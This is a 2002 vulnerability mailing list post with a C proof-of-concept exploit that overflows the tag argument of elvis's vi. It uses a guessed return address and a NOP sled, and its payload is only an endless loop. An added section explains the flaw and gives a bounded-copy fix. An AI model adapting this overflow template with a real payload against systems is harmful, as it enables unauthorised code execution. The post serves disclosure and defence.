Vulnerability Development mailing list archives
Re: VIM Buffer Overflow
From: Felipe Cerqueira <fcerqueira () bufferoverflow org>
Date: Sun, 17 Feb 2002 11:31:24 -0300 (BRT)
/* elvis 2.1_4 (slackware 8.0) Expl by skylazart
 *
 * It's only for demonstration purpose!
 */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>                       /* memset */

int
main (int argc, char **argv)
{
    char buffer[120 + 1];
    long ret_addr = 0xbffffcfc;           /* guessed stack address, adjustable via argv[1] */
    char sc[] = "\xeb\xfe";               /* loop for me please! ;)  (jmp -2: spins in place) */
    int i;
    char *argv1[] = {"/usr/bin/vi", "-t", buffer, NULL};

    if ( argc > 1 )
        ret_addr += atoi ( argv[1] );     /* optional offset added to the return address */

    /* fill the argument with copies of the return address; stop while a
       whole long still fits so the loop never writes past buffer[120] */
    for ( i = 0; i + sizeof (long) <= sizeof (buffer); i += 4 )
        *(long *)&buffer[i] = ret_addr;

    memset (buffer, 0x90, 22);            /* NOP sled at the start of the string */
    buffer[22] = sc[0];                   /* then the two-byte endless loop */
    buffer[23] = sc[1];
    buffer[120] = '\0';

    printf ("returning to 0x%08lx\n", ret_addr);
    printf ("endless loop.. ps auxw and kill it \\xeb\\xfe jump *ebp;)\n");
    execve ("/usr/bin/vi", argv1, NULL);  /* hand the crafted string to vi as the -t tag */
    return (0);
}
it only stops consisting...
root 3740 99.9 0.3 1668 780 tty2 R 11:30 0:14 /usr/bin/vi -t ??
--
Felipe Cerqueira
Buffer Overflow Inf. Ltda.
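The PoC above depends on a tag argument longer than the fixed buffer that receives it being copied without a length check. The following is an added example, not elvis's source (which this post does not show) and not the author's code: a hypothetical bounded tag-argument copy that rejects input exceeding its capacity, with the capacity chosen to match the size the PoC targets.

```c
/* Added example: bounded copy of a command-line tag argument.
 * Not elvis code; TAG_MAX, tag_req and set_tag are hypothetical names. */
#define _POSIX_C_SOURCE 200809L   /* for strnlen */
#include <stdio.h>
#include <string.h>

#define TAG_MAX 120   /* hypothetical capacity, the size the PoC's string fills */

struct tag_req {
    char name[TAG_MAX + 1];
};

/* Copies src into req->name. Returns 0 on success, or -1 (req untouched)
 * when src is longer than TAG_MAX bytes. */
int set_tag(struct tag_req *req, const char *src)
{
    /* strnlen looks at most TAG_MAX+1 bytes, so a huge src is safe to measure */
    size_t n = strnlen(src, TAG_MAX + 1);
    if (n > TAG_MAX)
        return -1;
    memcpy(req->name, src, n);
    req->name[n] = '\0';
    return 0;
}

/* Exercises the check on constructed inputs: a normal tag name and a
 * 199-byte string, longer than the PoC's 120-byte payload.
 * Returns 1 when both cases behave as expected, 0 otherwise. */
int demo_tag_check(void)
{
    struct tag_req req;
    char big[200];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    int rc_short = set_tag(&req, "main");
    int short_ok = (rc_short == 0 && strcmp(req.name, "main") == 0);
    int rc_long = set_tag(&req, big);           /* must be rejected */
    int long_ok = (rc_long == -1 && strcmp(req.name, "main") == 0);
    return (short_ok && long_ok) ? 1 : 0;
}

int main(void)
{
    printf("bounded tag copy: %s\n", demo_tag_check() ? "ok" : "FAILED");
    return 0;
}
```

The over-length case is rejected before any byte is written, so the caller can report the bad argument instead of letting it spill onto the stack.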
